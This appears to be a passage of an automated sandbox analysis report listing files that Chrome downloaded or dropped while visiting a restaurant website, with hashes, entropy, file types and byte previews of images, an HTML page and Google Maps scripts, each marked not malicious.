                                                                                                                                                    Preview:.PNG........IHDR...t...K........_....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 440x560, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):86437
                                                                                                                                                    Entropy (8bit):7.90140782578948
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:5MM35w1TKYMM35w1TKJtbCBdEQb6llW67j5VaXEhj15SBAKS2ztU4/B40Nar:5MM35kNMM35k3BNb6llW47BTISqZ40Mr
                                                                                                                                                    MD5:1EB207E821A0EE9FEEFEACBC071E6C70
                                                                                                                                                    SHA1:DB8544FFD1F10606E8E4B52F762D528AE36D3210
                                                                                                                                                    SHA-256:AC312EAE2E2E3F1CA496870CFA17F9D6B8B0710BD08747C4DDB05CE0094D496F
                                                                                                                                                    SHA-512:355140069A2DB6A2F1552F8AFEAF83CFE86699284168FEC7B8915803E91836BE29162FEC1D5CCCEB7AC65E41A1663BF16AAD6C5D7BCD498F249353A9ADAAA592
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....+"Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 18:15:13.............0221...................................0...............................r...........z.(................................)........H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................~.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......:OZa......z.,...o....o.....vYM..M.gt.....Wa.m....=..o...7.......U.=2.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (4632)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):31006
                                                                                                                                                    Entropy (8bit):5.548029155315869
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:qJhfJmZTlv2TmXEJ24mk/B4UnbjLeYX8iHMfBcv5mc5ajNeB1o0oAWYOxIFTWwrq:8BbvXQrNeG8y
                                                                                                                                                    MD5:B3E361BAAD69070C65C4394FC804D91A
                                                                                                                                                    SHA1:FD42AAFB6463713F2BE75A5B73F08DDDF4DF6CB4
                                                                                                                                                    SHA-256:D8427421CEE0B7A9768B360DA1C8F81E6F49E5561AC44884B627C8070156C3E3
                                                                                                                                                    SHA-512:0BD3D87BE1C52431A8B374D059364F8568ECA7343AC0CE2222B64DEF544D97731B86C8B3A49DC44E2EDFF0234A3C9CD91E1801B8CFCB9B0C88BC96E7D6E40679
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('onion', function(_){var gZa,hZa,iZa,WP,ZP,YP,lZa,mZa,nZa,kZa,oZa,aQ,pZa,qZa,rZa,uZa,wZa,xZa,zZa,AZa,DZa,FZa,HZa,KZa,GZa,IZa,MZa,JZa,NZa,fQ,gQ,eQ,hQ,SZa,TZa,iQ,UZa,VZa,jQ,WZa,XZa,kQ,c_a,b_a,nQ,h_a,i_a,j_a,g_a,k_a,m_a,pQ,q_a,r_a,s_a,l_a,n_a,o_a,t_a,u_a,oQ,D_a,E_a,H_a,G_a;gZa=function(a){a=_.kJa(a);if(!a)return null;var b=new VP;b=_.Yd(b,1,_.qD(String(_.Ec(_.Xg(a.Fg))),0));a=_.Yd(b,2,_.qD(String(_.Ec(_.Xg(a.Eg))),0));b=new eZa;a=_.qe(b,VP,1,a);return _.Kb(fZa(a),4)};hZa=function(a,b){_.Bg(a.Gg,1,b)};.iZa=function(a,b){_.Bg(a.Gg,2,b)};WP=function(){jZa||(jZa=[_.N,_.M,_.O])};ZP=function(a){_.LG.call(this,a,XP);YP(a)};YP=function(a){_.cG(a,XP)||(_.bG(a,XP,{entity:0,Ym:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],kZa()),_.cG(a,"t-ZGhYQtxECIs")||_.bG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};lZa=func
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (535)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):223898
                                                                                                                                                    Entropy (8bit):5.569634545782144
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:31hPTuFlPJ038r+G7Po9fsDB+ymJlC+RaWlKvLnF6YNgHeYA+jaL5hCw/3m+:31hPTuFlPJ038J7Po9EDBgJlC+RaWlKP
                                                                                                                                                    MD5:55B9B3B92484C1952379CFC8F20CF7F6
                                                                                                                                                    SHA1:8E1546F3A1A88D4B8B1A95C36CAC634632D40ACC
                                                                                                                                                    SHA-256:33D6BF90C2E77B7BD99DABD4D581B12B00FF0CA711B04210C73510CB87A730D3
                                                                                                                                                    SHA-512:1697C222E294E0001AAF84B64229CB6929E9A8FC4158BF3233B5FABC2206C11B61254AD69E7476C7DDFAF812A49F9D010AC11D416BDE5197B6300069104D7852
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/main.js
                                                                                                                                                    Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,la,oa,na,ra,caa,daa,eaa,ib,kb,haa,naa,paa,nc,oc,pc,rc,uaa,yaa,zaa,xaa,Iaa,Gaa,Haa,Eaa,Daa,Faa,zd,Kaa,Laa,xd,Maa,Oaa,Naa,Paa,Qaa,Md,Raa,Saa,Vaa,Waa,Yaa,Zaa,fe,bba,Fe,fba,iba,cba,hba,gba,eba,dba,jba,nba,We,qba,cf,rba,vba,xba,yba,zba,Cba,wf,xf,yf,zf,Eba,Fba,Jba,Gba,Iba,Cf,Nf,Kba,Pf,Qf,Lba,Mba,Oba,Qba,Rba,Vba,Wba,Vf,Xba,Uba,Sba,Tba,Zba,Yba,Xf,bca,aca,cca,ag,dca,fca,gca,hca,kca,gg,ig,jg,ica,jca,nca,kg,lg,mg,oca,og,ng,pca,rca,tca,xca,zca,yca,Bca,Aca,Gca,Hca,Lca,Mca,Fi,Oca,Pca,Qca,Tca,Sca,Uca,Oi,.Rca,Vca,oj,uj,Kj,Lj,bda,Uj,eda,gda
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):19267
                                                                                                                                                    Entropy (8bit):5.459733569935478
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:gY7yG1wbwbRvtbBbzvsbwbfabbEb1/Opnbf/fb6pX/pb+bpvsbzbtyGbzbG4uprx:V7y+wbwbRvtbBbzvsbwbfabbEb1/Opn9
                                                                                                                                                    MD5:DC92E846E03DBAA808887BB9D48D5F58
                                                                                                                                                    SHA1:ECACAD8D2A2FC00DADA07D18482B541838D1E830
                                                                                                                                                    SHA-256:9F2B5E09C0D38A1DA25B1498DCF32B73C9B13F5600503C454C3DB93976D1268A
                                                                                                                                                    SHA-512:3E11A4775DB6B8F1AAD998CCAE1A9699DEAA0CD1ACBA54868641732A83DE815CB942AF41CD39FDA96F002F4F59CE5A8C9A2BA2A07BBB4BD4CEB6D57FDC19836A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/gallery
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=452, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=678], progressive, precision 8, 290x290, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):45010
                                                                                                                                                    Entropy (8bit):7.759942456411198
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:27gTLXbJa+p7t7gTLXbJa+1Fhs3+37rjEQQ4qZhoKARgFK0g6z:28TbbJvf8TbbJv1Fhs32jZmongc05z
                                                                                                                                                    MD5:8BC3CC9C180E9CE4E35131F18750BD30
                                                                                                                                                    SHA1:E9A715A0695FF52571B5EC5B84D08324EF559FCB
                                                                                                                                                    SHA-256:B5A919CC77821D06BEF18FF89348225A63D5AE7792095CA785EEE0A0FF6BC42A
                                                                                                                                                    SHA-512:177FA109F84A1C46B68B3219C43A3F5D2F65A24482CC4385DDB69555CD8F12668AD881D44F550FF579BBFD5E6FC17F3B568BF7ECC50F5A8212B7BDC3C41E7548
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....(.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 21:40:11.............0221......................."..........."...............................r...........z.(................................'L.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....l..T.)..7.P{..$..i.O.......`$....\..s..[.A#M..ecMSDn..C..!..V7!R.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=640, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=726], progressive, precision 8, 2000x843, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):153179
                                                                                                                                                    Entropy (8bit):7.944155924659132
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:T5C5YOIeO6AxmrFsC4tMc6SwlDRAGJiUAoWTbjVoEpAh2RyD/:iIUAxeuwQGqoWTVoFgyL
                                                                                                                                                    MD5:550ED08CABCB04CDB8F70017506FA5A1
                                                                                                                                                    SHA1:C888AC29EDA4E32BC70CBCF34E9464460AE6B611
                                                                                                                                                    SHA-256:04A084DE76837793FF96F8A5EEB4B1E1331E3F36242DB798B3264FB451AF1BF7
                                                                                                                                                    SHA-512:1A89B91D753A7F2DBD3F71518D36D6A0D2CBAE5749B49EE0C3E1CA43825CCE0BF7ED821717A7A9A8CF6D386A007E76EA8739727DE37557C1971A118AC9121F50
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/header_6.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:11:44.............0221..................................K...............................r...........z.(.................................@.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..3....|....Z.O..j..~.\..}..{\.~[.*%.....6..e...WW_."....0m......sFk..M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 103 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):39783
                                                                                                                                                    Entropy (8bit):6.06457614718952
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:ZidDidRrRU5Ry5lcG6tt+uPK5EziMT6oh2l:ML0SGvQK5EziTohU
                                                                                                                                                    MD5:2B80D5E8FCC6B7E93268C2B287F09E8C
                                                                                                                                                    SHA1:D9EFF5E9FB95B317B48968E1C2426345EBF6CB98
                                                                                                                                                    SHA-256:F6650E945A745083A5ADA2B3958042A6DE46377A5E98F17FF2B786DA0B7CF18B
                                                                                                                                                    SHA-512:ABDEB5EEE6681BB299C3E8F96FB3F3549437930A77A76AD67E3462EFF5DD08744A5A74141A9D6BF9694ABD869348AB34F87BE900AFFB50E4BD9026E31A6831B8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Sekh_Kabab.png
                                                                                                                                                    Preview:.PNG........IHDR...g...N.....=.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 372 x 423, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):171446
                                                                                                                                                    Entropy (8bit):7.768226046897046
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:sasQe4bitSPO085vJUJu+X786mLrvszwERoLC0U2OE93reMi8B/TBU9:sasJX4OdxJCFmUzw5LCtEFiqhi9
                                                                                                                                                    MD5:A3CADB2708A187A69E319BA0A48DE0AA
                                                                                                                                                    SHA1:331B700E967307D396F0BC6C2CBA74ECBBE8689A
                                                                                                                                                    SHA-256:2FCFBD69260608D7B3DC2091A7E4784CEA854148C87717D9F956FDAE85ED4B88
                                                                                                                                                    SHA-512:F958DDE84379A785D3E9602206E1AD1873895D98272FE829931F57AC69C773602235D8DEED5DD670CA5F4A8E2AB63B07A2DACDFCA072CEE0F0454BE932AA3E90
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/logo.png
                                                                                                                                                    Preview:.PNG........IHDR...t................pHYs..!...!........9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2023-09-26T15:46:31+05:30</xmp:CreateDate>. <xmp:ModifyDate>2023-09-26T15:55:48+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1066, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):139143
                                                                                                                                                    Entropy (8bit):7.941376976898881
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:aHLHa2wLi3brZzqqJz6CVWeSGd8J9xYjApKlAT:aHLHDei3JBVvu9+sKiT
                                                                                                                                                    MD5:9660C9822BBBBE2415EA39041C96E552
                                                                                                                                                    SHA1:4731F13D5DB79423D2418599E583C013683901DE
                                                                                                                                                    SHA-256:D52A753AA2C0D1BA66E74DD52B3ADAB01A45C513B8A8A778510F37DDBADD0133
                                                                                                                                                    SHA-512:9B47D70D4E99AA9F68012FE3AAAF032048341E13607D005B93EE06F1B5F01B58C74F5BFDF449520ACBBF614CEF8E7443A1002A3CF6F32898E522A97A9B6BA307
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-3.jpg
                                                                                                                                                    Preview:....,.Exif..MM.*...............@...........*...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:08:32.............0221...................................................................r...........z.(................................+m.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c..Zv.r...&~;.7.n.-.t.j<.+...I. h......O.b.f.....'.Q..r..8.@{...[.[sj..[.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 870x910, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):189380
                                                                                                                                                    Entropy (8bit):7.957979804573264
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:/fUlCfUlQnyTUKDRbctw+2mhEvM+qG+U2dwt474manSFwO017PSO92x1n7nvoRNw:03myAKZhmhEvMzFd/8b17PSO92v7ARhk
                                                                                                                                                    MD5:B85B7939682A2F5D0A16E2E9BE426F05
                                                                                                                                                    SHA1:EFD069F15B6F757573A055085D21D763EA84B4AE
                                                                                                                                                    SHA-256:A6A1B9AE4CFE9F3A619AA761D548D3445E5387D4D4533F3AA5EFBB8CE02618C0
                                                                                                                                                    SHA-512:9E56C2C2B28B3F216FF5CFD848FC9E687E51C86BEEA4F56C47765E5414F0C78D5536D7D28DF70947AE84FF4AF4F2B7A18F60133892022E1A2D9B3C9761ECF8E7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....4]Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 15:28:42.............0221.......................f...........................................r...........z.(................................2........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...N.:..fU..e...ce.}g}....l.V........p.@gM.'.X>...V.i..jrs.....nX...{......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):185613
                                                                                                                                                    Entropy (8bit):7.957422054121931
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Zi6iCnnB/naR2BFNT2io0zEbHcbQ0o3eVkJwHioM0uZ+LbEqLK/JmzAxKN7BUcEf:9nIRA2iVEbCC3qjfM0GEdLAkUx27BUcG
                                                                                                                                                    MD5:F628A8BCDED282F991CD030CDD0B1273
                                                                                                                                                    SHA1:78C766A48522DACD5DE8F51CB14FE808973BFB41
                                                                                                                                                    SHA-256:A2DEA75A3CDF595AEE077E3FCC31F1434B5304B97F12FAA9B7C1BFE584A829DA
                                                                                                                                                    SHA-512:8B0E78F4252098253E95F0D5B25199B02EBDAADB3666DEBEE23CDD4848F578888DAE530C8246CCEAA4C02056100D00C8760D68C62EE70B3A20D9BA634864534B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....,.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:18:31.............0221...................................................................r...........z.(................................+o.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...Z....1.i$.`..:).....1..K.v.m.H...>...U...:..4x..G".*=uR....v..CuV.*..@h?
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1150
                                                                                                                                                    Entropy (8bit):2.8302465059791353
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RHEPriBSauX30Qql5Ei66m7nuXIg8JrHdNNtfkAfTRp6qn:SrijO30tQ96mSX18ZnMWX
                                                                                                                                                    MD5:B26017C39D320E413D59F41B638EB3C3
                                                                                                                                                    SHA1:C7320A39A8DF87DE8C60B2F9EEF1AAA8D590110F
                                                                                                                                                    SHA-256:3484C0506129D56DABE6A97E90407C312705D423068F0F6BD647D394C3526B61
                                                                                                                                                    SHA-512:F3DDE228C18D0F9402C992F1A3A360605D171FA13702B3C456C306236906A063085DE00899F9E61D175CAB138F97E303F97A7E90614BE5FC874E366D55160631
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/favicon.ico
                                                                                                                                                    Preview:............ .h.......(....... ..... .......................................................................................................................................................................................%..........................................................$..*c..1s.. .......................................[~......)...............?/..........BY........................../4k...J...2.'),.....'),.'),.%%Y......1Y..............................m..........(),7xzun..........................................*.5 ..........wtsh'),.........>............................{....Q.........'),.....'),.'),..............3...............................-......'),.'),......D..:...0...........................Cbt...#...................".%!....\..!!.............................<;......=...i...m...G.......3/...4.................................O..............<.+ .........-..................................................r.......................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (4632)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):31006
                                                                                                                                                    Entropy (8bit):5.548029155315869
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:qJhfJmZTlv2TmXEJ24mk/B4UnbjLeYX8iHMfBcv5mc5ajNeB1o0oAWYOxIFTWwrq:8BbvXQrNeG8y
                                                                                                                                                    MD5:B3E361BAAD69070C65C4394FC804D91A
                                                                                                                                                    SHA1:FD42AAFB6463713F2BE75A5B73F08DDDF4DF6CB4
                                                                                                                                                    SHA-256:D8427421CEE0B7A9768B360DA1C8F81E6F49E5561AC44884B627C8070156C3E3
                                                                                                                                                    SHA-512:0BD3D87BE1C52431A8B374D059364F8568ECA7343AC0CE2222B64DEF544D97731B86C8B3A49DC44E2EDFF0234A3C9CD91E1801B8CFCB9B0C88BC96E7D6E40679
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/onion.js
                                                                                                                                                    Preview:google.maps.__gjsload__('onion', function(_){var gZa,hZa,iZa,WP,ZP,YP,lZa,mZa,nZa,kZa,oZa,aQ,pZa,qZa,rZa,uZa,wZa,xZa,zZa,AZa,DZa,FZa,HZa,KZa,GZa,IZa,MZa,JZa,NZa,fQ,gQ,eQ,hQ,SZa,TZa,iQ,UZa,VZa,jQ,WZa,XZa,kQ,c_a,b_a,nQ,h_a,i_a,j_a,g_a,k_a,m_a,pQ,q_a,r_a,s_a,l_a,n_a,o_a,t_a,u_a,oQ,D_a,E_a,H_a,G_a;gZa=function(a){a=_.kJa(a);if(!a)return null;var b=new VP;b=_.Yd(b,1,_.qD(String(_.Ec(_.Xg(a.Fg))),0));a=_.Yd(b,2,_.qD(String(_.Ec(_.Xg(a.Eg))),0));b=new eZa;a=_.qe(b,VP,1,a);return _.Kb(fZa(a),4)};hZa=function(a,b){_.Bg(a.Gg,1,b)};.iZa=function(a,b){_.Bg(a.Gg,2,b)};WP=function(){jZa||(jZa=[_.N,_.M,_.O])};ZP=function(a){_.LG.call(this,a,XP);YP(a)};YP=function(a){_.cG(a,XP)||(_.bG(a,XP,{entity:0,Ym:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],kZa()),_.cG(a,"t-ZGhYQtxECIs")||_.bG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};lZa=func
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):37004
                                                                                                                                                    Entropy (8bit):5.867000437866873
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:0tdDi+UU5mh+8H0aAl21ChmpRBDLvcjLXk:+JR32EhmPpcXXk
                                                                                                                                                    MD5:7477261A907206BF834D9AE03F67A788
                                                                                                                                                    SHA1:E729168B525AB6B31D9E09BE38B19E552135825F
                                                                                                                                                    SHA-256:1B88859E30F2A2BD89279298D5C1313AA5F110256326A2B972E269F44A30F5F6
